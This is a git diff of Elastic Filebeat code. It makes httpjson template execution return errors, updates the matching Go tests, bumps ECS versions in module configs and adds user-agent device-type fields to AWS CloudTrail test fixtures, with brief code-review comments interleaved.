diff --git a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go index 9db90ce7ae1..6238bf06273 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go @@ -6,6 +6,7 @@ package v2 import ( "bytes" + "errors" "regexp" "strconv" "strings" @@ -21,6 +22,11 @@ const ( rightDelim = "]]" ) +var ( + errEmptyTemplateResult = errors.New("the template result is empty") + errExecutingTemplate = errors.New("the template execution failed") +) + type valueTpl struct { *template.Template } @@ -51,21 +57,21 @@ func (t *valueTpl) Unpack(in string) error { return nil } -func (t *valueTpl) Execute(trCtx *transformContext, tr transformable, defaultVal *valueTpl, log *logp.Logger) (val string) { - fallback := func(err error) string { - if err != nil { - log.Debugf("template execution failed: %v", err) - } +func (t *valueTpl) Execute(trCtx *transformContext, tr transformable, defaultVal *valueTpl, log *logp.Logger) (val string, err error) { + fallback := func(err error) (string, error) { if defaultVal != nil { log.Debugf("template execution: falling back to default value") return defaultVal.Execute(emptyTransformContext(), transformable{}, nil, log) } - return "" + return "", err } defer func() { if r := recover(); r != nil { - val = fallback(r.(error)) + val, err = fallback(errExecutingTemplate) + } + if err != nil { + log.Debugf("template execution failed: %v", err) } log.Debugf("template execution: evaluated template %q", val) }() @@ -83,9 +89,9 @@ func (t *valueTpl) Execute(trCtx *transformContext, tr transformable, defaultVal val = buf.String() if val == "" || strings.Contains(val, "") { - return fallback(nil) + return fallback(errEmptyTemplateResult) } - return val + return val, nil } var ( 
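Review bot: The recover branch in `Execute` now calls `fallback(errExecutingTemplate)` and never looks at `r`, so the panic's own message, which the old `fallback(r.(error))` passed to the debug log, is no longer recorded anywhere. When a default exists the reason for falling back is also lost, because `fallback` returns the default's result and the deferred `if err != nil` log is skipped. Logging first keeps the diagnosis without changing the returned sentinel: `log.Debugf("template execution panicked: %v", r)` as the first line inside `if r := recover(); r != nil`. Inside `fallback` the parameter `err` shadows the named result `err`; renaming it (for example `cause`) would make the deferred check easier to follow. Part of `Execute` lies between the two hunks and is not shown.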
diff --git a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go index b9be148d1f0..0fd8e996487 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go @@ -17,14 +17,15 @@ import ( func TestValueTpl(t *testing.T) { cases := []struct { - name string - value string - paramCtx *transformContext - paramTr transformable - paramDefVal string - expected string - setup func() - teardown func() + name string + value string + paramCtx *transformContext + paramTr transformable + paramDefVal string + expectedVal string + expectedError string + setup func() + teardown func() }{ { name: "can render values from ctx", @@ -36,7 +37,7 @@ func TestValueTpl(t *testing.T) { }, paramTr: transformable{}, paramDefVal: "", - expected: "25", + expectedVal: "25", }, { name: "can render default value if execute fails", @@ -46,7 +47,7 @@ func TestValueTpl(t *testing.T) { }, paramTr: transformable{}, paramDefVal: "25", - expected: "25", + expectedVal: "25", }, { name: "can render default value if template is empty", 
@@ -54,107 +55,123 @@ func TestValueTpl(t *testing.T) { paramCtx: emptyTransformContext(), paramTr: transformable{}, paramDefVal: "25", - expected: "25", + expectedVal: "25", + }, + { + name: "returns error if result is empty and no default is set", + value: "", + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + paramDefVal: "", + expectedVal: "", + expectedError: errEmptyTemplateResult.Error(), }, { name: "can render default value if execute panics", value: "[[.last_response.panic]]", paramDefVal: "25", - expected: "25", + expectedVal: "25", }, { - name: "func parseDuration", - value: `[[ parseDuration "-1h" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "-1h0m0s", + name: "returns error if panics and no default is set", + value: "[[.last_response.panic]]", + paramDefVal: "", + expectedVal: "", + expectedError: errExecutingTemplate.Error(), }, { - name: "func now", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ now ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func parseDuration", + value: `[[ parseDuration "-1h" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "-1h0m0s", }, { - name: "func now with duration", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ now (parseDuration "-1h") ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32 +0000 UTC", + name: "func now", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ now ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", }, { - name: "func parseDate", 
- value: `[[ parseDate "2020-11-05T12:25:32.1234567Z" "RFC3339Nano" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32.1234567 +0000 UTC", + name: "func now with duration", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ now (parseDuration "-1h") ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32 +0000 UTC", }, { - name: "func parseDate defaults to RFC3339", - value: `[[ parseDate "2020-11-05T12:25:32Z" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32 +0000 UTC", + name: "func parseDate", + value: `[[ parseDate "2020-11-05T12:25:32.1234567Z" "RFC3339Nano" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32.1234567 +0000 UTC", }, { - name: "func parseDate with custom layout", - value: `[[ (parseDate "Thu Nov 5 12:25:32 +0000 2020" "Mon Jan _2 15:04:05 -0700 2006") ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32 +0000 UTC", + name: "func parseDate defaults to RFC3339", + value: `[[ parseDate "2020-11-05T12:25:32Z" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32 +0000 UTC", }, { - name: "func formatDate", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ formatDate (now) "UnixDate" "America/New_York" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "Thu Nov 5 08:25:32 EST 2020", + name: "func parseDate with custom layout", + value: `[[ (parseDate "Thu Nov 5 12:25:32 +0000 2020" "Mon Jan _2 15:04:05 -0700 2006") ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32 +0000 
UTC", }, { - name: "func formatDate defaults to UTC", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ formatDate (now) "UnixDate" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "Thu Nov 5 13:25:32 UTC 2020", + name: "func formatDate", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ formatDate (now) "UnixDate" "America/New_York" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "Thu Nov 5 08:25:32 EST 2020", }, { - name: "func formatDate falls back to UTC", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ formatDate (now) "UnixDate" "wrong/tz"]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "Thu Nov 5 13:25:32 UTC 2020", + name: "func formatDate defaults to UTC", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ formatDate (now) "UnixDate" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "Thu Nov 5 13:25:32 UTC 2020", }, { - name: "func parseTimestamp", - value: `[[ (parseTimestamp 1604582732) ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func formatDate falls back to UTC", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ formatDate (now) "UnixDate" "wrong/tz"]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "Thu Nov 5 13:25:32 UTC 2020", }, { - name: "func parseTimestampMilli", - value: `[[ (parseTimestampMilli 1604582732000) ]]`, - 
paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func parseTimestamp", + value: `[[ (parseTimestamp 1604582732) ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", }, { - name: "func parseTimestampNano", - value: `[[ (parseTimestampNano 1604582732000000000) ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func parseTimestampMilli", + value: `[[ (parseTimestampMilli 1604582732000) ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", + }, + { + name: "func parseTimestampNano", + value: `[[ (parseTimestampNano 1604582732000000000) ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", }, { name: "func getRFC5988Link", @@ -171,8 +188,8 @@ func TestValueTpl(t *testing.T) { "", ), }, - paramTr: transformable{}, - expected: "https://example.com/api/v1/users?before=00ubfjQEMYBLRUWIEDKK", + paramTr: transformable{}, + expectedVal: "https://example.com/api/v1/users?before=00ubfjQEMYBLRUWIEDKK", }, { name: "func getRFC5988Link does not match", @@ -188,7 +205,7 @@ func TestValueTpl(t *testing.T) { }, paramTr: transformable{}, paramDefVal: "https://example.com/default", - expected: "https://example.com/default", + expectedVal: "https://example.com/default", }, { name: "func getRFC5988Link empty header", 
@@ -196,16 +213,16 @@ func TestValueTpl(t *testing.T) { paramCtx: emptyTransformContext(), paramTr: transformable{}, paramDefVal: "https://example.com/default", - expected: "https://example.com/default", + expectedVal: "https://example.com/default", }, { - name: "can execute functions pipeline", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ (parseDuration "-1h") | now | formatDate ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05T12:25:32Z", + name: "can execute functions pipeline", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ (parseDuration "-1h") | now | formatDate ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05T12:25:32Z", }, } @@ -220,10 +237,20 @@ func TestValueTpl(t *testing.T) { } tpl := &valueTpl{} assert.NoError(t, tpl.Unpack(tc.value)) - defTpl := &valueTpl{} - assert.NoError(t, defTpl.Unpack(tc.paramDefVal)) - got := tpl.Execute(tc.paramCtx, tc.paramTr, defTpl, logp.NewLogger("")) - assert.Equal(t, tc.expected, got) + + var defTpl *valueTpl + if tc.paramDefVal != "" { + defTpl = &valueTpl{} + assert.NoError(t, defTpl.Unpack(tc.paramDefVal)) + } + + got, err := tpl.Execute(tc.paramCtx, tc.paramTr, defTpl, logp.NewLogger("")) + assert.Equal(t, tc.expectedVal, got) + if tc.expectedError == "" { + assert.NoError(t, err) + } else { + assert.Equal(t, tc.expectedError, err.Error()) + } }) } } diff --git a/x-pack/filebeat/module/activemq/audit/config/audit.yml b/x-pack/filebeat/module/activemq/audit/config/audit.yml index 5b5cf7df03f..49973f8d997 100644 --- a/x-pack/filebeat/module/activemq/audit/config/audit.yml +++ b/x-pack/filebeat/module/activemq/audit/config/audit.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
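Review bot: In the last hunk of TestValueTpl, `assert.Equal(t, tc.expectedError, err.Error())` calls `Error()` on `err` without checking it, so a case that expects an error but gets `nil` panics the test run instead of reporting a failed assertion. `assert.EqualError(t, err, tc.expectedError)` checks both conditions and fails cleanly. Among the cases visible in these hunks none exercises a default template that itself fails or renders empty, which is the remaining path through `fallback`; one more table entry would cover it.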
diff --git a/x-pack/filebeat/module/activemq/log/config/log.yml b/x-pack/filebeat/module/activemq/log/config/log.yml index 58a8f27a0f3..b05d5769b27 100644 --- a/x-pack/filebeat/module/activemq/log/config/log.yml +++ b/x-pack/filebeat/module/activemq/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml index fc501fd4705..fd9402e2699 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml @@ -66,4 +66,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml index 8e04baa3395..1feedff152e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json index 50253665f08..5a1a6e7db81 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json @@ -44,6 +44,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "AWSConsole" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json index 47691a242dc..2b8a53f8fb3 100644 
--- a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json @@ -75,6 +75,7 @@ "user.id": "AROAIN5ATK5U7KEXAMPLE:JohnRole1", "user.name": "JohnDoe", "user_agent.device.name": "Spider", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239", "user_agent.os.full": "Linux 4.9.184", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json index f6bb959a8d6..2cf3e55f60e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json @@ -41,6 +41,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" @@ -85,6 +86,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json index ca6b38754cb..790e4dfe383 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json 
@@ -44,6 +44,7 @@ "user.id": "AIDACKCEVSQ6C2EXAMPLE", "user.name": "JohnDoe", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "user_agent.os.full": "Windows 7", @@ -97,6 +98,7 @@ "user.id": "AIDACKCEVSQ6C2EXAMPLE", "user.name": "JaneDoe", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "user_agent.os.full": "Windows 7", @@ -153,6 +155,7 @@ "user.id": "AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName", "user.name": "RoleToBeAssumed", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "user_agent.os.full": "Windows 7", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json index bfce5b07ccb..5c693213066 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json @@ -51,6 +51,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json index 7487c6d6581..7df2dcb82db 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json 
@@ -52,6 +52,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" }, @@ -100,6 +101,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json index f2ce56d3683..9f5a5d4c47e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json @@ -54,6 +54,7 @@ "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Other", "user_agent.original": "EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx", "user_agent.os.name": "Linux" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json index 66e126a2da2..07ecdb03589 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json @@ -53,6 +53,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } 
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json index 65b0db2d293..50852344f39 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json @@ -47,6 +47,7 @@ "user.target.id": "EXAMPLEUSERID", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.3.2 Python/2.7.5 Windows/7", "user_agent.os.name": "Windows", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json index 5ab34b15c5f..f92a8bcea77 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json @@ -46,6 +46,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "console.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json index 2639ed8a490..90280fe3dde 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } 
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json index 8146718df72..2bdaaa2d56b 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json @@ -47,6 +47,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json index a75b479f1f7..53aac5608fc 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json @@ -43,6 +43,7 @@ "user.id": "AIDAQRSTUVWXYZEXAMPLE:devdsk", "user.name": "AssumeNothing", "user_agent.device.name": "Spider", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]", "user_agent.os.full": "Linux 3.2.45", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json index d1c2ab6f9e7..a07e22e8cdc 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json @@ -45,6 +45,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" }, 
@@ -93,6 +94,7 @@ "user.id": "EXAMPLE_PRINCIPLE", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json index d1f4415d4cd..a33b2e39127 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json @@ -47,6 +47,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json index 58a7d7a36ad..94defa8dcb9 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json @@ -36,6 +36,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json index ac0c0163b5d..6607e3567c5 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json 
@@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json index ec713a1c41b..c7b26ce8440 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json @@ -44,6 +44,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json index f89c1b5ab53..22dd8a46738 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json @@ -36,6 +36,7 @@ "user.id": "REDACTED", "user.name": "REDACTED", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "REDACTED" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json index 253bf3d4523..da3ab76071d 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json 
@@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "console.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json index 419a86799cc..558bf96826d 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json @@ -48,6 +48,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json index 5d7299ae4c2..bfd33924614 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json @@ -39,6 +39,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json 